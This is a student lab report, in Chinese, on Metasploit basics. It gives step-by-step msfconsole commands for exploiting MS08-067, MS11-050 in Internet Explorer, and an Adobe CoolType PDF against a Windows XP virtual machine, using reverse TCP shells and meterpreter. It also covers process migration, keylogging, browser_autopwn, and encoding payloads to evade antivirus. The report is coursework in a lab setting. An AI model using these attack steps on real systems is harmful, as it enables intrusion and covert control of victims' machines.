20145227鄢曼君《网络对抗》MSF基础应用

主动攻击:ms08_067漏洞攻击实践

  • 两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)。在VMware中设置两台虚拟机网络为NAT模式,让两台虚拟机ping通。
  • 在kali终端中开启msfconsole。
  • 输入命令search ms08_067,会显示出找到的渗透模块:

  • 输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。
  • 输入命令show payloads会显示出有效的攻击载荷,我们找到一个shell_reverse_tcp。

  • 使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。
  • 输入命令set LHOST "kali Ip" set RHOST "Win xp Ip"

  • 使用命令show options查看payload状态。

  • 输入命令exploit开始攻击,攻击成功。

  • 在kali上执行ipconfig/all得到如下图所示:

  • 在win xp上执行同样的命令,如下图所示:

  • 可以发现二者结果相同,说明成功攻击。
  • 还可以进行MS08_067远程漏洞攻击实践:meterpreter
  • 前面都和上面的步骤相同。设置payload:set payload windows/meterpreter/reverse_tcp
  • 输入命令exploit开始攻击,攻击成功。

对浏览器攻击:MS11_050漏洞渗透攻击实践

  • 两台虚拟机相互ping通。
  • kali中开启msfconsole。由于这次做的是ms11_050漏洞攻击,输入命令use windows/browser/ms11_050_mshtml_cobjectelement,使用该模块;info即可查看关于该漏洞的信息

  • 设置相关信息:

  • show options查看设置好的相关信息:

  • exploit,靶机访问的ip地址如图:

  • 在靶机IE上输入网址,并在靶机上查看信息。

  • 查看kali,显示一个session 1已经创建:

  • 输入命令sessions -i 1,开始连接:

  • 攻击成功。可以进行一些操作,比如获取shell

  • 或者进行按键抓取:

Adobe阅读器渗透攻击

  • kali下打开显示隐藏文件。
  • 在kali终端中开启msfconsole
  • 输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。
  • 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
  • 设置相关数据:

  • 使用命令show options,看是否设置成功。

  • 输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。

  • 使用back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。
  • 使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。注意的是,这里需要输入命令set LPORT 5227和攻击模块里的数据设置为一样的。
  • 使用命令exploit开始攻击,在xp中打开pdf。攻击成功结果如下图:

  • 将进程迁移到explorer.exe.使用ps查看当前进程,并找到explorer.exe的进程号,如下图所示:

  • 使用命令migrate 296 成功后输入shell,可查看xp靶机信息。还可进行一些操作。

  • 在靶机xp中使用命令netstat -an,看本地tcp连接。发现成功连接。

辅助模块应用:使用浏览器渗透攻击server/browser_autopwn 模块

  • browser_autopwn 是 Metasploit 提供的辅助功能模块。在用户访问 Web 页面时,它会自动攻击受害者的浏览器。在开始攻击之前,browser_autopwn 能够检测用户使用的浏览器类型,根据浏览器的检测结果,自行部署最合适的 exploit。
  • 这是针对浏览器程序本身的渗透攻击,主要利用浏览器本身的漏洞,如 IE 浏览器,经常由于自身安全漏洞导致攻击者能够构造恶意网页进行渗透攻击。
  • 打开终端窗口,启动msfconsole,选择 server/browser——autopwn 模块,配置 LHOST、 SRVHOST 为主控端 IP,设置 URIPATH 为 auto。最后运行run

  • 之后 metasploit 会自动生成利用浏览器本身的一些典型漏洞的网页,此处生成了 20 个。

  • 攻击成功。查看检测结果,可以看到kali向靶机发送了很多数据包,用于检测该漏洞是否能利用,实际上靶机是打开了很多个网页,访问了产生的20个页面。

  • 可以进行一些操作:

  • 或者执行ipconfig命令:

问题回答

用自己的话解释什么是exploit,payload,encode.

  • exploit就相当于是一个运载的工具,将负责攻击的代码传送到靶机中。
  • payload也就是负责攻击的代码,之前我们实验就做过。
  • encode也就是编码,它主要有两个功能,一是为了避免之前的payload中出现坏字符,二就是它要伪装从而实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

实验体会

  • 这次实验最大的感受就是电脑有一个大的内存条是多么重要。之前做的时候同时开两个虚拟机电脑卡的要死,做一晚上只能做一点点,时间都浪费在等电脑反应上了。后面换了一个大的内存条,实验就很顺畅了。然后这次实验老师要求至少有一个和别人不一样,我觉得这点非常好,让我们在做的过程中能更多的去思考,而不是完全照着别人的过一遍而不思考。还有一个感受就是我们这次实验攻击的靶机都是xp系统,漏洞都是很早之前的,要想攻击现在的电脑可就没有这么容易了。有点期待下一周的任务了,又会有什么不一样的呢?

20145227鄢曼君《网络对抗》MSF基础应用的更多相关文章

  1. 20145227鄢曼君《网络对抗》Web安全基础实践

    20145227鄢曼君<网络对抗>Web安全基础实践 实验后回答问题 1.SQL注入攻击原理,如何防御? SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是 ...

  2. 20145227鄢曼君《网络对抗》Web基础

    20145227鄢曼君<网络对抗>Web基础 实验内容 (1)Web前端HTML (2)Web前端javascipt (3)Web后端:MySQL基础:正常安装.启动MySQL,建库.创建 ...

  3. 20145227鄢曼君《网络对抗》逆向及Bof基础

    20145227鄢曼君<网络对抗>逆向及Bof基础 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任 ...

  4. 20145227鄢曼君《网络对抗》shellcode注入&Return-to-libc攻击深入

    20145227鄢曼君<网络对抗>shellcode注入&Return-to-libc攻击深入 shellcode注入实践 shellcode基础知识 Shellcode实际是一段 ...

  5. 网络对抗——web基础

    网络对抗--web基础 实践内容 (1)Web前端HTML (2)Web前端javascipt (3)Web后端:MySQL基础:正常安装.启动MySQL,建库.创建用户.修改密码.建表 (4)Web ...

  6. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  7. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  8. 2018-2019-2 20165325 《网络对抗技术》 Exp5:MSF基础应用

    2018-2019-2 20165325 <网络对抗技术> Exp5:MSF基础应用 实验内容(概要) 1.1 一个主动攻击实践,本实验选择 ms17_010_eternalblue(成功 ...

  9. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

随机推荐

  1. deque Comparison of Queue and Deque methods Comparison of Stack and Deque methods

    1. 队列queue和双端队列deque的转换 Queue Method Equivalent Deque Methodadd(e) addLast(e)offer(e) offerLast(e)re ...

  2. sql中select into和insert into的区别

    select into主要是作用于没有新建表,在复制数据的时候新建 insert into主要作用于已经新建了一个表,直接把要复制的数据复制到新建好的表中

  3. 详解回调函数——以JS为例解读异步、回调和EventLoop

      回调,是非常基本的概念,尤其在现今NodeJS诞生与蓬勃发展中变得更加被人们重视.很多朋友学NodeJS,学很久一直摸不着门道,觉得最后在用Express写Web程序,有这样的感觉只能说明没有学懂 ...

  4. python修饰器各种实用方法

    This page is meant to be a central repository of decorator code pieces, whether useful or not <wi ...

  5. filter push down

    filter push down filter push down :先filter再做join 如果SQL里有where条件,那么数据库引擎会先filter再做join 但是MySQL5.6之前还不 ...

  6. 010-spring cloud gateway-过滤器-自定义局部、全局过滤器、区别

    一.自定义局部过滤器 自定义过滤器需要实现GatewayFilter和Ordered.其中GatewayFilter中的这个方法就是用来实现你的自定义的逻辑的 Mono<Void> fil ...

  7. (C#) SQLite数据库连接字符串

    最常用的:Data Source=filename;Version=3; 自增主键: Create  test1( [id] integer PRIMARY KEY AUTOINCREMENT ,[n ...

  8. liferay总结的通用的工具类

    在写增删改查的时候,自己动手写了几个通用的工具类,这几个通用的工具类也是基于API写的 第一个是liferay中的分页.跟我们做普通的web开发,分页是一样的首先需要建立一个分页的实体的类 packa ...

  9. CRM项目总结-封装PortletURLUtil

    package com.ebizwindow.crm.utils; import java.security.Key; import java.util.List; import javax.port ...

  10. discuz formhash

    class.core.php中 $this->var['formhash'] = formhash();define('FORMHASH', $this->var['formhash']) ...